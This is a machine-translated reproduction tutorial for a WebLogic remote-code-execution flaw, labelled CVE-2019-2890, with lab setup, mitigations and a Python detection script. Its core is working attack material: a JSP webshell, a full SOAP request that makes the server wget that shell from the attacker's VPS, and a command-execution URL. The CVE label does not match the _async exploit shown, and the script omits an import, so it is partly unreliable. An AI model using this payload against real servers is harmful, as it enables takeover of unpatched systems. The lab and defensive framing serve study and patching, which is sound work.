table of Contents
Three. Vulnerability environment construction
6. Vulnerability detection poc
Many loopholes reproducing articles are not detailed enough, that is, if you reproduce according to what he wrote, there will be many, many problems. I synthesized several articles and wrote down the most detailed steps to reproduce. Hope to help everyone avoid detours
1. Vulnerability introduction
On October 15, 2019, Oracle officially released the October 2019 security update bulletin, which contains a high-risk vulnerability that can cause RCE remote arbitrary code execution. The vulnerability number is CVE-2019-2890.
When Weblogic uses the T3 protocol for remote resource loading calls, it will perform blacklist filtering by default to ensure deserialization security. This vulnerability bypasses Weblogic's deserialization blacklist, allowing attackers to remotely attack vulnerable Weblogic components through the T3 protocol. Since the T3 protocol is enabled by default when the Weblogic console is turned on, and the default installation of Weblogic will automatically turn on the console, an attacker can use this vulnerability to cause remote code execution to control the Weblogic server.
2. Scope of influence
- WebLogic Server 10.3.6.0
- WebLogic Server 12.1.3.0
- WebLogic Server 12.2.1.3
Three. Vulnerability environment construction
Test environment version: weblogic 10.3.6.0
Use the vulnerability CVE-2017-10271 in vulhub directly, enter the relevant directory, and execute docker-compose up -d
Visit: 7001/console, the following environment is successfully set up
4. Vulnerability recurrence
Determine whether there is a vulnerability, as shown in the figure below, there may be a vulnerability
http://192.168.1.5:7001/_async/AsyncResponseService
1. Create the shell.txt file and start the web service
Here I create a shell.txt file on the remote vps. The content of the file is as follows. And start the web service with python in the directory where the current file is located, command: python3 -m http.server 11111
shell.txt
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
Visit the web service, the web service is opened successfully
2. Visit http://192.168.1.5:7001/_async/AsyncResponseService to intercept the data packet
Replace the intercepted data packet with the following data packet
POST /_async/AsyncResponseService HTTP/1.1
Host: you ip:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Connection: close
Content-Length: 858
content-type: text/xml
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://web服务ip:端口/shell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
As shown below, if the response data is returned, the operation is successful. At this time the Trojan file has been written to the server
3. Access the shell
http://192.168.1.5:7001/_async/shell.jsp?pwd=123&cmd=whoami
V. Bug fixes
1. Update Oracle October 2019 Patch
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
2. Control the access of T3 protocol
This vulnerability is generated in the T3 service of WebLogic, so the attacks against the vulnerability can be temporarily blocked by controlling the access of the T3 protocol. When opening the WebLogic console port (port 7001 by default), the T3 service will be enabled by default. Specific operation:
(1) Enter the WebLogic console, in the configuration page of base_domain, enter the "Security" tab page, click "Filter" to enter the connection filter configuration.
(2) Enter in the connection filter: weblogic.security.net.ConnectionFilterImpl, enter in the connection filter rule: 127.0.0.1 * * allow t3 t3s, 0.0.0.0/0 * * deny t3 t3s (t3 and t3s protocol All ports only allow local access).
(3) After saving, it needs to be restarted for the rules to take effect.
6. Vulnerability detection poc
#author:xcc
import requests
import re
import argparse
headers={
'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'
}
def url():
parser = argparse.ArgumentParser(description=' WebLogic 反序列化漏洞(CVE-2019-2890)POC')
parser.add_argument('target_url',type=str,help='The target address,example: http://192.168.140.153:7001')
args = parser.parse_args()
global url
url = args.target_url
print('[+]author:xcc')
print('[-]WebLogic 反序列化漏洞(CVE-2019-2890)检测')
print(f'[-]目标:{url}')
print('[-]正在请求目标地址...')
if url.startswith('http://') or url.startswith('https://'):
pass
else:
print('[-]Please include http:// or https:// in the URL!!')
os._exit(0)
def poc():
url_console = url + '/console'
try:
console_text = requests.get(url=url_console,headers=headers).text
ex = '<p id="footerVersion">WebLogic Server .*: (.*?)</p>'
result = re.findall(ex,console_text,re.S)
url_vul = url + "/_async/AsyncResponseService"
r = requests.get(url=url_vul,headers=headers)
version_list = ['12.2.1.3','12.1.3.0','10.3.6.0']
if r.status_code == 200 and "Welcome to the" in r.text and result[0] in version_list:
print('[+]漏洞存在')
else:
print('[-]漏洞不存在')
except Exception as error:
print('发生错误:',error)
if __name__ == '__main__':
url()
poc()